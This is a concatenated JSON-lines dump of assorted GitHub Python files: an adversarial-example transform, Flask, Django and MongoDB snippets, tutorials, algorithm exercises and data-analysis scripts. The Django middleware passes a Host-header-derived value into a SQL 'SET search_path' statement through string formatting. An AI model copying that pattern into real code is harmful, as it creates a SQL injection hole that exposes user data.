padded = F.pad(rescaled, [pad_left.item(), pad_right.item(), pad_top.item(), pad_bottom.item()], value=0)\r\n\r\n        return padded if torch.rand(1) < self.diversity_prob else x\r\n\r\n\r\n","repo_name":"NoWindButRain/IMPure","sub_path":"advattack/difgsm/difgsm.py","file_name":"difgsm.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"901250351","text":"import boto3\n\ndef authenticate_user(headers):\n    bearer_token = headers.get('Authorization').split('Bearer ')[1]\n    try:\n        client = boto3.client('cognito-idp')\n        response = client.get_user(\n            AccessToken=bearer_token)\n\n    except Exception as e:\n        raise Exception(str(e))\n    \n    return response","repo_name":"yadavbhudev11/template-backend","sub_path":"playground/common/user_autentication.py","file_name":"user_autentication.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
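The `input_diversity` transform above randomly downscales a batch and zero-pads it back to the target size with probability `diversity_prob`. A standalone sketch of the same idea, using plain ints instead of tensor indices (sizes and defaults are illustrative):

```python
import torch
import torch.nn.functional as F

def random_resize_pad(x, resize_rate=0.9, p=0.5):
    # with probability 1 - p, return the batch unchanged
    if torch.rand(1).item() >= p:
        return x
    size = x.shape[-1]
    low, high = sorted((size, int(size * resize_rate)))
    rnd = int(torch.randint(low, high, (1,)))  # random intermediate size
    resized = F.interpolate(x, size=(rnd, rnd), mode='bilinear', align_corners=False)
    pad = high - rnd
    left = int(torch.randint(0, pad + 1, (1,)))
    top = int(torch.randint(0, pad + 1, (1,)))
    # pad back to the target size with zeros at random offsets
    return F.pad(resized, [left, pad - left, top, pad - top], value=0)
```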
+{"seq_id":"12552312847","text":"#!/usr/bin/env python3\n\n# May you recognize your weaknesses and share your strengths.\n# May you share freely, never taking more than you give.\n# May you find love and love everyone you find.\n\nimport os\nimport sqlite3\n\nfrom flask import (\n    Flask,\n    g,\n    redirect,\n    render_template,\n    request,\n)\napp = Flask(__name__)\n\n\ndef get_db():\n    db = getattr(g, '_database', None)\n    if db is None:\n        db_path = os.path.join(app.instance_path, 'zoom.db')\n        db = sqlite3.connect(db_path)\n        db.row_factory = sqlite3.Row\n        g._database = db\n\n    return db\n\n@app.teardown_appcontext\ndef close_connection(exception):\n    db = getattr(g, '_database', None)\n    if db is not None:\n        db.close()\n\ndef init_db():\n    \"\"\"Initialize the database.\n\n    Use this like so:\n    >>> from zoom_shortener import init_db\n    >>> init_db()\n    \"\"\"\n    with app.app_context():\n        db_path = os.path.join(app.instance_path, 'zoom.db')\n        if os.path.exists(db_path):\n            return\n\n        print('Setting up database at {}...'.format(db_path))\n        os.makedirs(app.instance_path, exist_ok=True)\n\n        db = get_db()\n        with app.open_resource('schema.sql', mode='r') as f:\n            db.cursor().executescript(f.read())\n        db.commit()\n        print('done!')\n\ndef query_db(query, args=(), one=False):\n    cur = get_db().execute(query, args)\n    rv = cur.fetchall()\n    cur.close()\n    return (rv[0] if rv else None) if one else rv\n\n@app.route('/create')\ndef create_new_link():\n    redirects = query_db('select * from redirects')\n    return render_template('create.html', redirects=redirects)\n\n@app.route('/create', methods=['POST'])\ndef handle_new_link():\n    link_id = request.form['short-id']\n    url = request.form['long-url']\n    try:\n        db = get_db()\n        db.execute('insert into redirects values (?, ?)', (link_id, url))\n        db.commit()\n    except sqlite3.IntegrityError:\n        return 'sorry, key already used'\n\n    return 'ok'\n\n@app.route('/<link_id>')\ndef redirect_to_url(link_id):\n    row = query_db('select url from redirects where id=?', (link_id,), one=True)\n    if not row:\n        return 'not found'\n    return redirect(row['url'], code=307)\n\n\ninit_db()\n","repo_name":"xiongchiamiov/zoom","sub_path":"zoom_shortener/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"74752615146","text":"#reduce() : for cumulative operations\n#reduce() function takes 2 arguments:\n#       1.lambda function\n#       2.Iterable type like list\n\nfrom functools import reduce\n#ex:1\nlist1=[1,2,3,4,5,6]\n\nres1=reduce(lambda x,y:x+y,list1)\nprint(res1)\n\n#o/p:\n#(((((1+2)+3)+4)+5)+6) =21\n\n#ex:2 To find the largest number\nres2=reduce(lambda x,y:x if(x>y) else y,list1)\nprint(res2)\n","repo_name":"Shashivardhan3/python","sub_path":"Functions/26 reduce.py","file_name":"26 reduce.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"17544764617","text":"from bisect import bisect_right\nfrom typing import List\n\n\nclass Solution:\n    \"\"\"\n    The problem gives a sorted list arr and a target number.\n    Using the target number we must check whether the sum of two entries in arr equals the target.\n    Idea: Binary Search.\n    Loop over each num in the arr numbers, then initialize left, right\n    and tmp, where tmp is the value to search for in the subarray using Binary Search.\n    P/s: The problem asks for 1-based answers: [0, 1] with target = 1 -> [1, 2]\n    \"\"\"\n\n    def twoSum(self, numbers: List[int], target: int) -> List[int]:\n        for i in range(len(numbers)):\n            left, right = i + 1, len(numbers) - 1\n            tmp = target - numbers[i]\n            while left <= right:\n                mid = left + (right - left) // 2\n                if numbers[mid] == tmp:\n                    return [i + 1, mid + 1]\n                elif numbers[mid] < tmp:\n                    left = mid + 1\n                else:\n                    right = mid - 1\n    # Time Complexity: O(NlogN)\n    # Space Complexity: O(1)\n\n\nprint(Solution().twoSum([2, 3, 4], 6))\n","repo_name":"thehaung/DSnA","sub_path":"Python/binary_search/two-sum-ii-input-array-is-sorted.py","file_name":"two-sum-ii-input-array-is-sorted.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36679135519","text":"import itertools\nimport time\nimport sys\nimport math\nT1 = time.time()\n\ndef primenumbers(L):\n    notprimes = set()\n    primes = []\n    for counter in range(2,L):\n        if counter in notprimes: \n            continue\n        \n        for j in range(counter*counter,L+1,counter):\n            notprimes.add(j)\n        \n        primes.append(counter)\n    return primes \n    \npriem = primenumbers(int(math.sqrt(float(987654321))))\npriem_num = len(priem)\nT2 = time.time()\ndef perms(n):\n    ans = []\n    x = list(itertools.permutations(str(n)))\n    for verz in x:\n        getal = \"\"\n        for num in verz:\n            getal += num\n        ans.append(int(getal))\n    return list(reversed(ans))\nx = perms(1234567)\n\nprint(T2-T1)\n\nfor i in x:\n    for j in priem:\n        if(i / j == int(i/j)):\n            print(i)\n            break\n        if(j > math.sqrt(float(i))):\n            print(i / j)\n            print(i)\n            sys.exit(0)\n    \nT3 = time.time()\nprint(T3-T2)","repo_name":"CasperHagenaars/WISB256","sub_path":"Euler Challenge/Euler41.py","file_name":"Euler41.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
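The two-sum solution above runs a binary search per element (O(N log N)); since the input is already sorted, the classic two-pointer scan solves it in O(N). A sketch, keeping the same 1-based answer convention:

```python
from typing import List

def two_sum_sorted(numbers: List[int], target: int) -> List[int]:
    left, right = 0, len(numbers) - 1
    while left < right:
        s = numbers[left] + numbers[right]
        if s == target:
            return [left + 1, right + 1]  # 1-based indices, as above
        if s < target:
            left += 1   # sum too small: move the left pointer right
        else:
            right -= 1  # sum too large: move the right pointer left
    return []
```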
+{"seq_id":"39722910773","text":"from django.db import connection\n\nclass Subdomains:\n    def process_request(self, request):\n        \"\"\"Inject subdomain information into request\"\"\"\n        host = request.get_host()\n        parts = host.split('.')\n        if len(parts) > 2:\n            subdomain = u'.'.join(parts[:-2])\n            try:\n                from django.conf import settings\n                if subdomain in getattr(settings, 'MAIN_SUBDOMAIN', ()):\n                    subdomain = None\n            except ImportError:\n                pass\n        else:\n            subdomain = None\n        request.subdomain = subdomain\n        schema = 'account_%s' % subdomain\n        cursor = connection.cursor()\n        cursor.execute(\"SET search_path TO %s, public\" % schema)\n        return None\n","repo_name":"marcua/qurk_experiments","sub_path":"qurkexp/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"18181837313","text":"import random\nimport requests\n\ndef createExperiment(host, groupExp, allExperimentPartitionIDConditionPair):\n    url = f\"http://{host}/api/experiments\"\n    # context = [\"assign-prog\", \"app\", \"addition\"]\n    context = [\"addition\"]\n    states = [\"enrolling\"]\n    postExperimentRules = [\"assign\", \"continue\"]\n\n    if( groupExp == True):\n        # parameters for group experiment testing:\n        consistencyRules = [\"group\"]\n        asssignmentUnits = [\"group\"]\n        groups = [\"classId\"]\n    \n    else:\n        # parameters for individual experiment testing:\n        consistencyRules = [\"individual\"]\n        asssignmentUnits = [\"individual\"]\n        groups = [\"class\", \"school\", \"district\", \"teacher\"]\n    \n    # random ids up to:\n    n = 100\n    # assignment weight for 1st condition: (1-100):\n    weight = 50\n\n    conditionCode1 = \"c\" + str(random.randint(1,n))\n    conditionCode2 = \"c\" + str(random.randint(1,n))\n    expId1 = \"id\" + str(random.randint(1,n))\n    expPoint1 = \"p\" + str(random.randint(1,n))\n    expId2 = \"id\" + str(random.randint(1,n))\n    expPoint2 = \"p\" + str(random.randint(1,n))\n\n    PartitionIDConditionPair1 = {\"experimentPoint\": expPoint1, \"partitionId\" : expId1, \"condition\" : conditionCode1}\n    PartitionIDConditionPair2 = {\"experimentPoint\": expPoint2, \"partitionId\" : expId2, \"condition\" : conditionCode2}\n    allExperimentPartitionIDConditionPair.append(PartitionIDConditionPair1)\n    allExperimentPartitionIDConditionPair.append(PartitionIDConditionPair2)\n\n    # JSON data for creating an experiment:\n    data = {\n        \"name\": \"TestExp\"+ str(random.randint(1,n)),\n        \"description\": \"Test experiment is created here\",\n        \"consistencyRule\": random.choice(consistencyRules),\n        \"assignmentUnit\": random.choice(asssignmentUnits),\n        \"group\": random.choice(groups),\n        \"postExperimentRule\": random.choice(postExperimentRules),\n        \"state\": random.choice(states),\n        \"tags\": [\"Workspace\", \"Content\"],\n        \"context\": [random.choice(context)],\n        \"conditions\": [\n            {\n                \"name\": \"condition1\",\n                \"description\": \"condition description 1\",\n                \"assignmentWeight\": weight,\n                \"conditionCode\": conditionCode1\n            },\n            {\n                \"name\": \"condition2\",\n                \"description\": \"condition description 2\",\n                \"assignmentWeight\": 100-weight,\n                # \"conditionCode\": random.choice(conditionCodes)\n                \"conditionCode\": conditionCode2\n            }\n        ],\n        \"partitions\": [\n            {\n                \"name\": expPoint1,\n                \"expId\": expId1,\n                \"expPoint\": expPoint1,\n                \"description\": expId1\n            },\n            {\n                \"name\": expPoint2,\n                \"expId\": expId2,\n                \"expPoint\": expPoint2,\n                \"description\": expId2\n            }\n        ]\n    }\n\n    response = requests.post(url, json = data)\n    if response.status_code != 200:\n        print(f\"createExperiment Failed with {response.status_code}\")\n    else:\n        print(\"New Experiment is created\")\n    \n    return 
allExperimentPartitionIDConditionPair","repo_name":"CarnegieLearningWeb/educational-experiment-service","sub_path":"locust/createExperiment.py","file_name":"createExperiment.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"23593054698","text":"#!/usr/bin/env python3\n\nimport pandas as pd\nfrom pprint import pprint\nfrom pathlib import Path\n\n\ndef main():\n \"\"\"\n Using pathlib library to read in file assuming file and program store in same location\n \"\"\"\n cwd = Path.cwd()\n\n pth = cwd / 'featuresdf.csv'\n\n # Load data\n df = pd.read_csv(\"featuresdf.csv\")\n\n zip_df = zip(df.artists, df.name)\n\n print(\"-----Part 1-----\")\n # Part 1 -- Generators\n print(''.join([f'{artist}, {name}\\n' for artist, name in zip_df if artist == 'Ed Sheeran']), end=' ')\n\n # Part 2 -- closure\n def music_function(df):\n \n def get_music(level):\n return ''.join([f'{artist}, {name}, {energy:.1f}\\n' for artist, name, energy in df if energy > level])\n\n return get_music\n\n\n print(\"\\n-----Part 2-----\")\n\n dataset = zip(df.artists, df.name, df.energy)\n\n music_level = music_function(dataset)\n print(music_level(0.8))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/Gabe_Lamberth/lesson02/music_gen.py","file_name":"music_gen.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27184753527","text":"from dotenv import load_dotenv\nfrom pymongo import MongoClient, ReadPreference\n\nload_dotenv()\n\n\nclass PokemonRepository:\n def __init__(self, mongo_url, db_name, coll_name):\n self.client = MongoClient(mongo_url)\n self.db = self.client[db_name]\n self.collection = self.db.get_collection(coll_name)\n\n def find(self, projection=None, skip=0, limit=0, filter=None, sort=None):\n return self.collection.find(\n projection=projection, skip=skip, limit=limit, filter=filter, sort=sort\n )\n\n def list_databases(self):\n print(self.client.list_database_names())\n\n def count(self):\n return self.collection.count_documents({})\n\n def insert_one(self, document):\n return self.collection.insert_one(document)\n\n def insert_many(self, documents):\n return self.collection.insert_many(documents)\n\n def insert_many_with_transaction(self, documents):\n with self.client.start_session() as session:\n with session.start_transaction():\n self.collection.insert_many(documents, session=session)\n\n def create_collection(self):\n self.collection.drop()\n pokemon_schema = {\n \"bsonType\": \"object\",\n \"required\": [\"no\", \"name\", \"form\", \"isMegaEvolution\", \"types\"],\n \"properties\": {\n \"no\": {\n \"bsonType\": \"int\"\n },\n \"name\": {\n \"bsonType\": \"string\"\n },\n \"form\": {\n \"bsonType\": \"string\"\n },\n \"isMegaEvolution\": {\n \"bsonType\": \"bool\"\n },\n \"types\": {\n \"bsonType\": \"array\"\n }\n }\n }\n self.db.create_collection(\"pokemon\", validator={\"$jsonSchema\": pokemon_schema})\n","repo_name":"misaosyushi/mongo-exercise","sub_path":"pokemon_repository.py","file_name":"pokemon_repository.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29912862689","text":"#!/usr/bin/python3\r\n###########################################################\r\n# For rodent exomes, 03.2021\r\n# Simply counts all 
the Ns and heterozygous sites in each\r\n# exome assembly\r\n###########################################################\r\n\r\nimport sys, os, core, math, argparse, subprocess, multiprocessing as mp\r\n\r\n###########################################################\r\n\r\nasmdir = \"../01-Assembly-data/10-Varcall/\";\r\noutfilename = \"logs/count-ns.csv\";\r\n\r\nwith open(outfilename, \"w\") as outfile:\r\n headers = [\"sample\", \"contig\", \"length\", \"Ns\", \"hets\", \"softmasked\"];\r\n outfile.write(\",\".join(headers) + \"\\n\");\r\n for sample in os.listdir(asmdir):\r\n print(\"# Reading sample:\", sample);\r\n asmfile = os.path.join(asmdir, sample, sample + \"-iupac-consensus.fa\");\r\n contigs = core.fastaGetDict(asmfile);\r\n print(\"# \", len(contigs), \"contigs read.\");\r\n\r\n for contig in contigs:\r\n #print(contig);\r\n\r\n sample_dict = { contig : {'Ns' : 0, 'hets' : 0, 'softmasked' : 0} };\r\n seq = contigs[contig];\r\n\r\n ns = seq.count(\"N\") + seq.count(\"n\");\r\n hets = sum( [ seq.count(base) for base in \"RYSWKMBDHVryswkmbdhv\" ] );\r\n soft = sum( [ 1 for base in seq if base.islower() ] );\r\n\r\n outline = [ sample, contig.split(\" \")[0][1:], str(len(seq)), str(ns), str(hets), str(soft) ];\r\n outfile.write(\",\".join(outline) + \"\\n\");\r\n\r\n\r\n\r\n\r\n","repo_name":"goodest-goodlab/murinae-seq","sub_path":"01-Assembly/scripts/count_ns.py","file_name":"count_ns.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69943680109","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 8 01:09:35 2023\n\n@author: green-machine\n\"\"\"\n\n\nimport numpy as np\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import (ShuffleSplit, cross_val_score,\n train_test_split)\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\n\n\ndef custom_cv_2folds(X: np.ndarray) -> tuple[np.ndarray]:\n \"\"\"\n http://scikit-learn.org/stable/modules/cross_validation.html\n\n Parameters\n ----------\n X : np.ndarray\n DESCRIPTION.\n\n Yields\n ------\n idx : TYPE\n DESCRIPTION.\n idx : TYPE\n DESCRIPTION.\n\n \"\"\"\n n = X.shape[0]\n _ = 1\n while _ <= 2:\n idx = np.arange(n * (_ - 1) / 2, n * _ / 2, dtype=int)\n yield idx, idx\n _ += 1\n\n\ndef main() -> None:\n # =========================================================================\n # Make Dataset\n # =========================================================================\n X, y = load_iris(return_X_y=True)\n\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=.4, random_state=0\n )\n # =========================================================================\n # Support Vector Machine: Support Vector Classification\n # =========================================================================\n estimator = SVC(kernel='linear', C=1).fit(X_train, y_train)\n\n scores = cross_val_score(estimator, X, y, cv=5)\n print('Cross Validation: Base Scoring')\n print(f'Accuracy: {scores.mean():,.4f} (+/- {2 * scores.std():,.4f})')\n\n scores = cross_val_score(estimator, X, y, cv=5, scoring='f1_macro')\n print('Cross Validation: F1 Scoring')\n print(f'Accuracy: {scores.mean():,.4f} (+/- {2 * scores.std():,.4f})')\n\n cross_validator = ShuffleSplit(n_splits=5, test_size=.3, random_state=0)\n scores = cross_val_score(estimator, X, y, cv=cross_validator)\n print('Cross Validation: Shuffle Split')\n 
print(f'Accuracy: {scores.mean():,.4f} (+/- {2 * scores.std():,.4f})')\n\n cross_validator = custom_cv_2folds(X)\n scores = cross_val_score(estimator, X, y, cv=cross_validator)\n print('Cross Validation: Custom')\n print(f'Accuracy: {scores.mean():,.4f} (+/- {2 * scores.std():,.4f})')\n\n scaler = StandardScaler().fit(X_train)\n X_train_transformed = scaler.transform(X_train)\n estimator = SVC(C=1).fit(X_train_transformed, y_train)\n X_test_transformed = scaler.transform(X_test)\n scores = estimator.score(X_test_transformed, y_test)\n print('Cross Validation: Standard Scaler')\n print(f'Accuracy: {scores.mean():,.4f} (+/- {2 * scores.std():,.4f})')\n\n estimator = make_pipeline(StandardScaler(), SVC(C=1))\n cross_validator = ShuffleSplit(n_splits=5, test_size=.3, random_state=0)\n scores = cross_val_score(estimator, X, y, cv=cross_validator)\n print('Cross Validation: Composite Estimator')\n print(f'Accuracy: {scores.mean():,.4f} (+/- {2 * scores.std():,.4f})')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"avtomatik/sklearn","sub_path":"src/iris_cross_validation.py","file_name":"iris_cross_validation.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3815456531","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Course',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=72)),\n ('credit_hours', models.IntegerField()),\n ('course_id', models.CharField(max_length=10)),\n ('course_number', models.IntegerField()),\n ],\n ),\n migrations.CreateModel(\n name='Department',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=72)),\n ],\n ),\n migrations.CreateModel(\n name='Instructor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('first_name', models.CharField(max_length=72)),\n ('last_name', models.CharField(max_length=72)),\n ('email', models.EmailField(max_length=254)),\n ],\n ),\n migrations.CreateModel(\n name='Student',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('first_name', models.CharField(max_length=72)),\n ('last_name', models.CharField(max_length=72)),\n ('email', models.EmailField(max_length=254)),\n ],\n ),\n migrations.AddField(\n model_name='course',\n name='department',\n field=models.ForeignKey(related_name='courses', to='mainapp.Department'),\n ),\n migrations.AddField(\n model_name='course',\n name='instructor',\n field=models.ForeignKey(related_name='courses', to='mainapp.Instructor'),\n ),\n migrations.AddField(\n model_name='course',\n name='students',\n field=models.ManyToManyField(related_name='courses', to='mainapp.Student'),\n ),\n ]\n","repo_name":"dallinskinner/DjangoTestingExample","sub_path":"mainapp/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23767767574","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom 
scipy.stats import f_oneway, ttest_ind, chi2_contingency, ttest_1samp\nfrom statsmodels.stats.multicomp import pairwise_tukeyhsd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import LabelEncoder\n\nstudents_performance = pd.read_csv('data/StudentsPerformance.csv')\npd.set_option('display.max_columns', None)\n\n#Inspecting first 5 rows of the data\nprint(students_performance.head(), '\\n')\nscores = ['math score', 'reading score', 'writing score']\n\n#Dataframe info\nprint(students_performance.info(), '\\n')\n\n#Proportions of specific categorical data\ngender_proportion = students_performance[\"gender\"].value_counts().reset_index()\nrace_proportion = students_performance[\"race/ethnicity\"].value_counts().reset_index()\npreparation_proportion = students_performance[\"test preparation course\"].value_counts().reset_index()\nlunch_proportion = students_performance[\"lunch\"].value_counts().reset_index()\nparental_education_proportion = students_performance[\"parental level of education\"].value_counts().reset_index()\nproportions = [gender_proportion, race_proportion, preparation_proportion, lunch_proportion, parental_education_proportion]\n\nplt.figure(figsize=(12, 6))\nfor i, proportion in enumerate(proportions):\n plt.subplot(1, 5, i+1)\n plt.title(f'{proportion.columns[-1]} proportion')\n plt.pie(proportion.iloc[:, 1], autopct='%d%%')\n plt.axis('equal')\n plt.legend(proportion.iloc[:, 0])\nplt.tight_layout()\nplt.show()\n\n#Visualize math, reading and writing score depending on ethnitical group, gender, test preparation courses, parental level of education and lunch\ndependencies = ['race/ethnicity', 'gender', 'test preparation course', 'parental level of education', 'lunch']\nfor result in scores:\n plt.figure(figsize=(18, 9))\n for count, dependence in enumerate(dependencies):\n plt.subplot(1, 5, count+1)\n sns.barplot(y=result, data=students_performance, x=dependence)\n plt.title(f'{result} vs {dependence}')\n plt.xticks(rotation=-15)\n plt.tight_layout()\n plt.show()\n\n#Visualise distribution of scores dependent on gender, test preparation and ethnitical groups\ndependencies = ['race/ethnicity', 'gender', 'test preparation course']\nfor result in scores:\n plt.figure(figsize=(18, 9))\n for count, dependence in enumerate(dependencies):\n plt.subplot(1, 3, count + 1)\n sns.kdeplot(result, data=students_performance, hue=dependence, shade=True)\n plt.title(f'{result} vs {dependence}')\n sns.despine()\n plt.tight_layout()\n plt.show()\n\n#\ncompleted_preparation = students_performance[students_performance['test preparation course'] == 'completed']\nnone_preparation = students_performance[students_performance['test preparation course'] == 'none']\n\nmale_performance = students_performance[students_performance['gender'] == 'male']\nfemale_performance = students_performance[students_performance['gender'] == 'female']\n\ngroupA_performance = students_performance[students_performance['race/ethnicity'] == 'group A']\ngroupB_performance = students_performance[students_performance['race/ethnicity'] == 'group B']\ngroupC_performance = students_performance[students_performance['race/ethnicity'] == 'group C']\ngroupD_performance = students_performance[students_performance['race/ethnicity'] == 'group D']\ngroupE_performance = students_performance[students_performance['race/ethnicity'] == 'group E']\n\n#Check difference in standard deviation in scores of gender\nmale_scores_std = np.std(male_performance)\nfemale_scores_std = 
np.std(female_performance)\ndifference_scores_std_gender = abs(male_scores_std - female_scores_std)\nprint('Difference of standard deviation of genders:\\n', difference_scores_std_gender, '\\n') ## Standart deviation of scores are about to be the same\n\n#Check difference in standard deviation in scores of courses\ncompleted_preparation_scores_std = np.std(completed_preparation)\nnone_preparation_scores_std = np.std(none_preparation)\ndifference_scores_std_courses = abs(completed_preparation_scores_std - none_preparation_scores_std)\nprint('Difference of standard deviation of courses:\\n', difference_scores_std_courses, '\\n') ##Standard deviation of scores are about to be the same except writing scores (1.63 difference)\n\n#Check difference in standard deviation in scores of race groups\ngroupA_scores_std = np.std(groupA_performance)\ngroupB_scores_std = np.std(groupB_performance)\ngroupC_scores_std = np.std(groupC_performance)\ngroupD_scores_std = np.std(groupD_performance)\ngroupE_scores_std = np.std(groupE_performance)\ndifference_scores_std_race = abs(groupE_scores_std - groupA_scores_std - groupD_scores_std - groupC_scores_std - groupB_scores_std)\nprint('Difference of standard deviation of races:\\n', difference_scores_std_race, '\\n') #There is a big difference in spread, so we can not check hypothesis on this data\n\n#Testing association between test preparation and scores\ncompleted_preparation = students_performance[students_performance['test preparation course'] == 'completed']\nnone_preparation = students_performance[students_performance['test preparation course'] == 'none']\n\n#Math score and test prep\ntstat, test_prep_pval = ttest_ind(completed_preparation[scores], none_preparation[scores])\nprint('''\nH0 - mean score of students who completed course and not are the same.\nHA - mean score of students who completed course and not are not the same.\n''')\nfor score, result in enumerate(test_prep_pval):\n if result < 0.05:\n print(f'For {scores[score]} we accept that they have different mean score.')\n else:\n print(f'For {scores[score]} we accept that they have the same mean score.')\n\n### THERE IS A BIG DIFFERENCE IN MEAN SCORES OF STUDENT WHO COMPLETED EXTRA COURSES AND NOT ###\n#Inspecting the mean values of student who completed course and not completed\ncompleted_preparation_scores_mean = np.mean(completed_preparation)\nnone_preparation_scores_mean = np.mean(none_preparation)\nprint(f'Mean for students who completed courses\\n{completed_preparation_scores_mean}\\nMean for those who not completed courses\\n{none_preparation_scores_mean}')\n#In average those students who completed courses has more scores than those who does not complete courses\n\n#Check association between gender and test results\n#Math score and test gender\ntstat, gender_scores_pval = ttest_ind(male_performance[scores], female_performance[scores])\nprint('''\nH0 - mean score of students of both genders are the same.\nHA - mean score of students of both genders are not the same.\n''')\nfor score, result in enumerate(gender_scores_pval):\n if result < 0.05:\n print(f'For {scores[score]} we accept that both genders have different mean score.')\n else:\n print(f'For {scores[score]} we accept that both genders have the same mean score.')\n\n### BOTH GENDERS HAVE DIFFERENT SCORES\n#Inspecting mean value of scores by genders\nmale_scores_mean = np.mean(male_performance)\nfemale_scores_mean = np.mean(female_performance)\nprint(f'Mean of scores for male \\n{completed_preparation_scores_mean}\\nMean of scores 
for female \\n{none_preparation_scores_mean}')\n#In average male student have more math score but have less reading and writing score\n\n#Cross tabulation of race/ethnicity and parental level of education\nrace_education_tab = pd.crosstab(students_performance['race/ethnicity'], students_performance['parental level of education'])\n#Association between race/ethnicity and parental level of education\nchi2, race_education_pval, dof, exp = chi2_contingency(race_education_tab)\nprint('''\nH0 - there is an association parental level of education and ethnicity group.\nHA - there is no association between parental level of education and writing ethnicity group.\n''')\nresult = 'Reject H0' if race_education_pval < 0.05 else \"Accept H0\"\nprint(f\"Chi2: {chi2}, confident level: {race_education_pval}\\n\")\nprint(result) ## There is an association in this parameters\n\n#What is the most influenced parameters for scores\nplt.figure(figsize=(18, 9))\nfor i, score in enumerate(scores):\n feature_set = students_performance.drop(scores, axis=1)\n for column in feature_set.columns:\n encoder = LabelEncoder()\n feature_set[column] = encoder.fit_transform(feature_set[column])\n target = students_performance[score]\n linear_model = LinearRegression().fit(feature_set, target)\n ax = plt.subplot(1, 3, i+1)\n coefficients = abs(linear_model.coef_)\n x_values = range(len(coefficients))\n plt.bar(x_values, coefficients)\n plt.title(f'Influence of Parameter by Linear Regression for {score}')\n plt.ylabel('Coefficients')\n plt.xlabel('Parameters')\n plt.xticks(rotation=-15)\n ax.set_xticks(x_values)\n ax.set_xticklabels(feature_set.columns)\nplt.tight_layout()\nplt.show()\n\n\n","repo_name":"VolodymyrBrintsov/Students-Performance-in-Exams","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":8836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24789421601","text":"\"\"\"Tests for segmentation_datasets.\"\"\"\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\nimport jax\nimport ml_collections\nfrom scenic.projects.robust_segvit.datasets import segmentation_datasets\n\nEXPECTED_DATASETS = [\n ('ade20k', 'ade20k', 'validation'),\n]\n\n\nclass SegmentationVariantsTest(parameterized.TestCase):\n\n @parameterized.named_parameters(EXPECTED_DATASETS)\n def test_available(self, name, val_split):\n \"\"\"Test we can load a corrupted dataset.\"\"\"\n num_shards = jax.local_device_count()\n config = ml_collections.ConfigDict()\n config.batch_size = num_shards*2\n config.eval_batch_size = num_shards*2\n config.num_shards = num_shards\n\n config.rng = jax.random.PRNGKey(0)\n config.dataset_configs = ml_collections.ConfigDict()\n config.dataset_configs.train_target_size = (120, 120)\n config.dataset_configs.name = name\n config.dataset_configs.denoise = None\n config.dataset_configs.use_timestep = 0\n config.dataset_configs.val_split = val_split\n dataset = segmentation_datasets.get_dataset(**config)\n batch = next(dataset.valid_iter)\n self.assertEqual(\n batch['inputs'].shape,\n (num_shards, config.eval_batch_size // num_shards, 120, 120, 3))\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"google-research/scenic","sub_path":"scenic/projects/robust_segvit/tests/segmentation_datasets_test.py","file_name":"segmentation_datasets_test.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":2619,"dataset":"github-code","pt":"37"} 
